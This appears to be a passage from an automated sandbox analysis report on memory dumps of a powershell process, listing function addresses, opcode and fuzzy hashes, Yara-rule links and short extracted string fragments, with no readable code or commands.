Instruction ID: 3150c967b5e8a8c7bf53e1add1f712bbf40fa78052b4ee71345c7b411333c00a
Opcode Fuzzy Hash: 3c9f637192b462eb223decaf488c514ebccd79996e8259b977b8ce91dfb5c672
Instruction Fuzzy Hash: C001577240D3D09ED7128B259C94652BFA8EF43224F1984CBE8888F1A7C2689845C772

Function 0332D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751461672.000000000332D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0332D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_332d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a75a654ccc928fc21b7d79b94670764b86f7347dc6b9664cb19180b58a8593
Instruction ID: aa61e24fe3fd2b33a4f63f23cf3a26c5fddba66aec0dd013cd9956e217e139db
Opcode Fuzzy Hash: 61a75a654ccc928fc21b7d79b94670764b86f7347dc6b9664cb19180b58a8593
Instruction Fuzzy Hash: 0B0126310083509AE710CA2ADDC4B67FF9CEF41324F1CC46AED684B2A6C27DD841C6B1

Function 04C6BF48 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dba84b6e6d988dcc92d4896a9c9c2acfb9af1f61aa9b4274379ba48cb667fb03
Instruction ID: 3060603648d049dcc2a90c7733a1606b7df432760b181b1f243bb82032d35120
Opcode Fuzzy Hash: dba84b6e6d988dcc92d4896a9c9c2acfb9af1f61aa9b4274379ba48cb667fb03
Instruction Fuzzy Hash: D5F022367083A01FD7008A799C9496BBFE9EF86350B0480ABF995C7362DA70DD048760

Function 04C67C20 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdcd19f43d99778da4baf7f2e3814fedf82b658a2287444f311bfa389f2f13c4
Instruction ID: 23f6a281c4f4ae780f416c0c0a81a2551dc947135303c86fdb0d2653c5c23f06
Opcode Fuzzy Hash: bdcd19f43d99778da4baf7f2e3814fedf82b658a2287444f311bfa389f2f13c4
Instruction Fuzzy Hash: A5F08B317053405FCB119B249C849AF7BE9EF89621700056EE01ED7351DE346C82C730

Function 04C69110 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d06d94347ca0bfc25a3a50248cf080b7d5b52247ffa7f7ffccae92d350383f3c
Instruction ID: edcead09d7dc4924db2d040c2b01fe0482e11ca772db638859b87855780ded88
Opcode Fuzzy Hash: d06d94347ca0bfc25a3a50248cf080b7d5b52247ffa7f7ffccae92d350383f3c
Instruction Fuzzy Hash: B7F02879A192001BDB159B3890583AB3FA2DFC2368F1481AEC5164F396CE396806CBB1

Function 04C6BF58 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ec5e248664116f562a3d173ae22e278648072c0de065b2c2edfbbdaa6f43845
Instruction ID: ae3227570b0a83310698c733612aadf41800f1312e633bc938d3b2109903546f
Opcode Fuzzy Hash: 4ec5e248664116f562a3d173ae22e278648072c0de065b2c2edfbbdaa6f43845
Instruction Fuzzy Hash: 55F0BE363083645FD7108A6A9C849BBBFEDEBCA621B04807AF984C3351CAB1DD0086A0

Function 0332D993 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751461672.000000000332D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0332D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_332d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd589df9760f30a44e758136b41f822b9ef4e6d1c57953af217e2344e7b5c6a9
Instruction ID: 103413fac96797c37527c1966752ef9d7723f57a3a55fb2d98c6e8001cac2fae
Opcode Fuzzy Hash: bd589df9760f30a44e758136b41f822b9ef4e6d1c57953af217e2344e7b5c6a9
Instruction Fuzzy Hash: 78F0E276200610AF9720CF0AD984C27FBADEBD4670319C5AAE85A5B616C671E842CAA0

Function 04C6E018 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c7f7cc03c96804715a75bd184f06e63a6cee227f297b5dca2e6ae1c8e564a08
Instruction ID: a3e073cb44b65223c8967b61c2f1aa4f9e9849224d59399cd3c294ce24a3d79a
Opcode Fuzzy Hash: 9c7f7cc03c96804715a75bd184f06e63a6cee227f297b5dca2e6ae1c8e564a08
Instruction Fuzzy Hash: 3CF082383081408FC3118F2CD4A4C66BBF6AFCA71572940DAE485DB776DA61DC02DF50

Function 04C69190 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43a01f615c489c65bf9029517d4bdd60786cea23efcd904d4b5731df027345bb
Instruction ID: 7e3b813a094da07a4e51539aa367cbd9867afdc1e1527697b8fa082cf2ce6e5d
Opcode Fuzzy Hash: 43a01f615c489c65bf9029517d4bdd60786cea23efcd904d4b5731df027345bb
Instruction Fuzzy Hash: D2F090755053004BD7108B78D4EC396BFA6EB42310F14845ED19EC7282DB39B8818B90

Function 04C67C30 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9594791c5290a186149f17b8562b3522a2d2c61f3068d7861fab3fc5cf7d728f
Instruction ID: 291992b6501ccf7c1c02e4e501ca7f47bac7398ab6707386334a1717ef8ca30c
Opcode Fuzzy Hash: 9594791c5290a186149f17b8562b3522a2d2c61f3068d7861fab3fc5cf7d728f
Instruction Fuzzy Hash: 32F0A7317006149FCB109A59D88497FB7EAEB88675B50453DE10ED7310DF34AD428764

Function 0332D984 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751461672.000000000332D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0332D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_332d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb36b6217ec00addd43be19395f813591bf7f171d6dda10c38d2438abd20e059
Instruction ID: 02b50244452cba7b04d242752f93a3a016fefd9c6c0a052527432ffd96d053e6
Opcode Fuzzy Hash: cb36b6217ec00addd43be19395f813591bf7f171d6dda10c38d2438abd20e059
Instruction Fuzzy Hash: 09F0F976104690AFD725CF06CD84D23BBB9FB99620B198499B85A5B716C631FC42CFA0

Function 04C69120 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c2904e41feddd6c077a1ec01456489f434ae6d276b4e4b9d100cb2d40dee306
Instruction ID: 5d697dfe33aee2233674223d678969d1c00494a55c853f1b96a54e9fd5f76b1b
Opcode Fuzzy Hash: 4c2904e41feddd6c077a1ec01456489f434ae6d276b4e4b9d100cb2d40dee306
Instruction Fuzzy Hash: 5DF02739A002045BE700AB69D0543AB7B96DFC0738F10817ACA094B384CE3D7802CBF1

Function 04C6E028 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e943938f3d781a1cc1e53b4ae6a3c05eb34edf135242be29adf71d399e4851d5
Instruction ID: dfa43bc9fd44ed56e85e13e5c6796932a7ac4761d6a4b952a882038cac4bf5a2
Opcode Fuzzy Hash: e943938f3d781a1cc1e53b4ae6a3c05eb34edf135242be29adf71d399e4851d5
Instruction Fuzzy Hash: 7CE065393001008F83108B1DD498C26B7EAEFCEB2571940AAE54ADB764DA32EC01DBA0

Function 04C62C06 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a31e1369ad86fb1bd44eb486fc7394d1716391ab5efd84cf31dd42b4778c457b
Instruction ID: 0994e491fc6cd52d20867857e66a89b4257d1b1ef417524ebe9eb5c4f5d729d7
Opcode Fuzzy Hash: a31e1369ad86fb1bd44eb486fc7394d1716391ab5efd84cf31dd42b4778c457b
Instruction Fuzzy Hash: D4F0D435A001099FDB15CF9DD990AEEF7B2FF88324F208199E515A72A1C736AD52CB60

Function 04C6AFC0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 295eaa4a4f455aad70e369cb590d0dce31b27448e85ffe244ab9c23c21ebae70
Instruction ID: ef679c08348f9e3e4693ebf516415a407077b81f8af53630c76121cdd35378bc
Opcode Fuzzy Hash: 295eaa4a4f455aad70e369cb590d0dce31b27448e85ffe244ab9c23c21ebae70
Instruction Fuzzy Hash: F2E0D8217193D11A8B1A813D28984666F6346C3660308C1FFE082DB357C95358064353

Function 04C68DB3 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56f48b4624ddd6bf8fd7ab463a5dde382060f136113a9ae5271f6c999c9327d4
Instruction ID: 7fb5c64affb02dca607a36809c9e32bb74362b14b5c9db4bc0c0b928ea1627a4
Opcode Fuzzy Hash: 56f48b4624ddd6bf8fd7ab463a5dde382060f136113a9ae5271f6c999c9327d4
Instruction Fuzzy Hash: DBE0D83570461557CB09AB75D45C2AE7A66EBC4725F01412EE71A83342CF39A8128BD9

Function 04C69581 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d63beb74669f740be35958fb5b3533a2df931490dab2b05de1d3d9c84c73dba
Instruction ID: edf4378c059163c1f57d1d43b18365ddb8f706cffa36fdae218189a094db7cc8
Opcode Fuzzy Hash: 8d63beb74669f740be35958fb5b3533a2df931490dab2b05de1d3d9c84c73dba
Instruction Fuzzy Hash: D7E0C2527020A20B1B1834BD19A06BE99CB4EC606D744823ACA17D7749DD70DC0513F2

Function 04C68771 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c45fdec38f6f801aa9b1a0729e0692bd4bff2e0a852bd13febc8039bccbcc3a1
Instruction ID: e52d29dc2df400845e01213ff39116626c90e766e0c120c37f73ee99e454d2c9
Opcode Fuzzy Hash: c45fdec38f6f801aa9b1a0729e0692bd4bff2e0a852bd13febc8039bccbcc3a1
Instruction Fuzzy Hash: 47E0D83481A149CBCF0AEBBAD5AF4ED7F31FA16311B1041ADD52381253DA619549CF80

Function 04C691A0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27b35b7e86a5f5c7c052bba00b55b111f8c3bad9462398fb0faee22cdd9bd68e
Instruction ID: 7999ea0305f72f7f7673c7ba977cb42af9c4b92b9a0e1af2af26eef5433279d9
Opcode Fuzzy Hash: 27b35b7e86a5f5c7c052bba00b55b111f8c3bad9462398fb0faee22cdd9bd68e
Instruction Fuzzy Hash: 18F039749003044BD360DF78D4D879ABBE5FB44320F004429E64EC7341DB39A8818B90

Function 04C68DB8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e9704defc6b6113ff1001d5ed101717d5a6d518ce55b5a85af7528c609e17ba
Instruction ID: fab598997247488d5d670147dee071cda8b4d9e04af54ecce2e34e0098217335
Opcode Fuzzy Hash: 1e9704defc6b6113ff1001d5ed101717d5a6d518ce55b5a85af7528c609e17ba
Instruction Fuzzy Hash: A4E0263570461057CB08B775A42C2AE7A57EBC4724F01002EE70A83343CF38A8028BDD

Function 04C69588 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e715e571c297d8c7e9ecef6d644bfbdfb16ec884e506892f942d73e792deec83
Instruction ID: 79edc4f324a108e9aa180c34d6a44b2bd7c61ea959f89a35ceaac9b7dcf957d1
Opcode Fuzzy Hash: e715e571c297d8c7e9ecef6d644bfbdfb16ec884e506892f942d73e792deec83
Instruction Fuzzy Hash: 38D05E523111660B1A1834AE18907BBA5CF8EC64A9785813A9B2AD7749ED70EC0113F3

Function 04C6DEC8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: 3bb7f535844bb70c857e49481ffb59c0b87206aacfa201bec6a07ebcc65283b9
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: 80E08635B04014978B08959AD8504D9F7AADBCC220F04C47FD94BA7740EA32691597E1

Function 04C6F640 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9420a17a46ca381749530c663d5a458419484bb0156762a6e770fff76351510
Instruction ID: 339fb4d76590814f7a0944d028e1a43ab81d8affaa52572fa4e659720cdf524a
Opcode Fuzzy Hash: a9420a17a46ca381749530c663d5a458419484bb0156762a6e770fff76351510
Instruction Fuzzy Hash: 25E01A70D0010ADFC780DFB8998115AFBF0AB48304B2085AA9918D7211EA314616DB91

Function 04C6F650 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: aa860e79912c7d66da30bc9d53103f4b48596154f1b5f22bbab7d977c752b945
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: D5D042B0D042099F8780EFAD994156EFBF4AB48204B6485AA8919E7211E6329A128BD1

Function 04C68780 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62392006a811798dd6b969b08b0841c3db8123b16c8f50187d671d049c2bceda
Instruction ID: 7ac6a2089208a0dd5406629c35dc32a59ed83950a7d6e3c2d06c226b49ce61b6
Opcode Fuzzy Hash: 62392006a811798dd6b969b08b0841c3db8123b16c8f50187d671d049c2bceda
Instruction Fuzzy Hash: DDD017308051098BCB08AFA5E96B4BDBB34FA00301F41416DE91792292EE206A4ACEC0

Function 04C68C50 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba7af3606887abe15d7988bfc958a0f737712ab104b6a0c5e9490b4a96acc0c3
Instruction ID: 5fd7844d419278deb34f05747845601d5b9198017cd1dfe4d1b5d2cc15ff8d71
Opcode Fuzzy Hash: ba7af3606887abe15d7988bfc958a0f737712ab104b6a0c5e9490b4a96acc0c3
Instruction Fuzzy Hash: CAD05B34E0520A8FC704EF65E55646EBFB5E745304F008159DE1993351EA305801CFD1

Function 04C68170 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ecb46c612b41c953af09ecf5fd084c9e3d3b1f88ba65c1c3e0817912d8e8cf
Instruction ID: a7b6fcdaa06726ba4b506d37fb3d44651bb92aaa8c636bbb79e721ca7ed3dbe7
Opcode Fuzzy Hash: 06ecb46c612b41c953af09ecf5fd084c9e3d3b1f88ba65c1c3e0817912d8e8cf
Instruction Fuzzy Hash: 6EC02B559183800FEF0346320C26015BF70854311138712C2D811CF2A2C814C802DB31

Function 04C67C08 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f43548d0adc7ff4b46e9d154b9944e04c41152fac4f7182c52a32569191810c7
Instruction ID: a0e6f35833734bf36438d8aada0367b66e9f8b94774566573b3f32870887c817
Opcode Fuzzy Hash: f43548d0adc7ff4b46e9d154b9944e04c41152fac4f7182c52a32569191810c7
Instruction Fuzzy Hash: 02B0923104470D8FC6497F75E4088147329FB4161939008A8E90E0B3A2CE36E98ACA45

Non-executed Functions

Function 079E0FB8 Relevance: 11.4, Strings: 9, Instructions: 184COMMON

Download Yara Rule

Strings

$^q, xrefs: 079E1229
$^q, xrefs: 079E1253
$^q, xrefs: 079E1044
fcq, xrefs: 079E10A2
`Q^q, xrefs: 079E10ED
$^q, xrefs: 079E1081
`Q^q, xrefs: 079E1153
$^q, xrefs: 079E1065
tP^q, xrefs: 079E1127

Memory Dump Source

Source File: 00000002.00000002.1763697419.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79e0000_powershell.jbxd

Similarity

API ID:
String ID: fcq$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2306644927
Opcode ID: ef7e57b003bf37058a0833ac6f0b88c7b47e41ccc542852501fe3c4e7a40bc63
Instruction ID: 94132ae300094580f68e6d2b1e319193e644b8b64d0a7d00d3c10a9be5a959be
Opcode Fuzzy Hash: ef7e57b003bf37058a0833ac6f0b88c7b47e41ccc542852501fe3c4e7a40bc63
Instruction Fuzzy Hash: 6E61B1B0A8020EDFDF2ACE44C944BAA77FEBF45359F148455E8019B295C7B1DD84CBA1

Function 079E3928 Relevance: 10.3, Strings: 8, Instructions: 316COMMON

Download Yara Rule

Strings

tP^q, xrefs: 079E39B1
4'^q, xrefs: 079E3B29
$^q, xrefs: 079E396C
tP^q, xrefs: 079E39A5
$^q, xrefs: 079E3C0E
$^q, xrefs: 079E393A
4'^q, xrefs: 079E3B35
$^q, xrefs: 079E3960

Memory Dump Source

Source File: 00000002.00000002.1763697419.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
API String ID: 0-3865595929
Opcode ID: ff03f64f5b33abfb83d70cf0b609478371a8a75ef16dcfa245ccd5c7f5a423f1
Instruction ID: 3ac9d6be7019ab7f46bf9477addebb597462f71eb3c5305ed98282aa0a93711c
Opcode Fuzzy Hash: ff03f64f5b33abfb83d70cf0b609478371a8a75ef16dcfa245ccd5c7f5a423f1
Instruction Fuzzy Hash: DCA167B17043559FC7269B69C804776BBEEAFC6318F18886AE446CB391CA32D885C791

Function 079E2CA8 Relevance: 10.3, Strings: 8, Instructions: 262COMMON

Download Yara Rule

Strings

$^q, xrefs: 079E2CBA
4'^q, xrefs: 079E2EEE
tP^q, xrefs: 079E2D25
tP^q, xrefs: 079E2D31
$}k, xrefs: 079E2EBF
4'^q, xrefs: 079E2EF8
$^q, xrefs: 079E2CEC
$^q, xrefs: 079E2CE0

Memory Dump Source

Source File: 00000002.00000002.1763697419.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$}k
API String ID: 0-2778979842
Opcode ID: af10ccbf0100a568b26cc34996e1a12fd841dc3a063678bd648599c23763ec6a
Instruction ID: e7683a58eb0bc109c579ccc1436a39f64bfbc24f1ee8ac612adb8f39b0d3161c
Opcode Fuzzy Hash: af10ccbf0100a568b26cc34996e1a12fd841dc3a063678bd648599c23763ec6a
Instruction Fuzzy Hash: 24819CB27047168FD7268B68880166ABBEDBFC5324F1488AED905CF391DB72DC85C791

Function 079E3678 Relevance: 6.4, Strings: 5, Instructions: 191COMMON

Download Yara Rule

Strings

$^q, xrefs: 079E3836
$^q, xrefs: 079E382A
4'^q, xrefs: 079E372E
4'^q, xrefs: 079E3722
$^q, xrefs: 079E37FF

Memory Dump Source

Source File: 00000002.00000002.1763697419.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 5872ddec6a6d079fbfa236cd8228879bb2d720023593260124092c73a8d50877
Instruction ID: cfbd61db1a98d695330a6706bcd346e087886b71c61c7f4433df8b882487cae5
Opcode Fuzzy Hash: 5872ddec6a6d079fbfa236cd8228879bb2d720023593260124092c73a8d50877
Instruction Fuzzy Hash: 0A5125F17043469FCB264A69C90176ABBFEAFC2619F28887BD445CB351DA32C849C791

Function 079E3280 Relevance: 5.3, Strings: 4, Instructions: 257COMMON

Download Yara Rule

Strings

$al, xrefs: 079E357C
p5}k, xrefs: 079E344F
tP^q, xrefs: 079E3324
tP^q, xrefs: 079E3330

Memory Dump Source

Source File: 00000002.00000002.1763697419.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79e0000_powershell.jbxd

Similarity

API ID:
String ID: $al$p5}k$tP^q$tP^q
API String ID: 0-947078440
Opcode ID: ba1b3e69ad196b7e969f1e8dcf05d88fb6e8003d681eafd093999f0588d5f0c7
Instruction ID: a22ef2d8cf6c5d5c7c62c6fee6782d5c9148109d6448c486a3d79471520f3b03
Opcode Fuzzy Hash: ba1b3e69ad196b7e969f1e8dcf05d88fb6e8003d681eafd093999f0588d5f0c7
Instruction Fuzzy Hash: 91814AB1B043459FC7228B68C901B6ABFEDAF86314F48C86AD449DF391EA71D845C3A1

Function 079E5BF8 Relevance: 5.2, Strings: 4, Instructions: 248COMMON

Download Yara Rule

Strings

4'^q, xrefs: 079E5EFE
4'^q, xrefs: 079E5F08
4'^q, xrefs: 079E5D2D
4'^q, xrefs: 079E5D37

Memory Dump Source

Source File: 00000002.00000002.1763697419.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 39a79ddc6414a272a899ff742a15af8429e3c6c59aeac76d87b2a86dc2fbc68f
Instruction ID: 7f73a124fa75724f830d7173e32e9f95c0b51ccc14368b0f4d8f85ba389827d8
Opcode Fuzzy Hash: 39a79ddc6414a272a899ff742a15af8429e3c6c59aeac76d87b2a86dc2fbc68f
Instruction Fuzzy Hash: 49819EB1B002059FCB264B688D0566A77EEAFD121CB168C7AD911DF391DB32DCE5C3A1

Function 04C67CE9 Relevance: 5.2, Strings: 4, Instructions: 243COMMON

Download Yara Rule

Strings

`_q, xrefs: 04C67E6A
`_q, xrefs: 04C67F0C
`_q, xrefs: 04C67F8A
`_q, xrefs: 04C67DEB

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: `_q$`_q$`_q$`_q
API String ID: 0-3297199963
Opcode ID: 87029a42696f901173ddd44fb4cda3adaac605d5d5e5661f39a40ae20a564a92
Instruction ID: fae07d3446f81a79164b5012d5d8ac12a0308e0055d05d1d37a40850c173eac8
Opcode Fuzzy Hash: 87029a42696f901173ddd44fb4cda3adaac605d5d5e5661f39a40ae20a564a92
Instruction Fuzzy Hash: 2DB1A674E012099FDB55DFA9D980A9DFBF2FF88304F208629E419AB315DB34A945CF90

Function 04C67CF8 Relevance: 5.2, Strings: 4, Instructions: 234COMMON

Download Yara Rule

Strings

`_q, xrefs: 04C67E6A
`_q, xrefs: 04C67F0C
`_q, xrefs: 04C67F8A
`_q, xrefs: 04C67DEB

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: `_q$`_q$`_q$`_q
API String ID: 0-3297199963
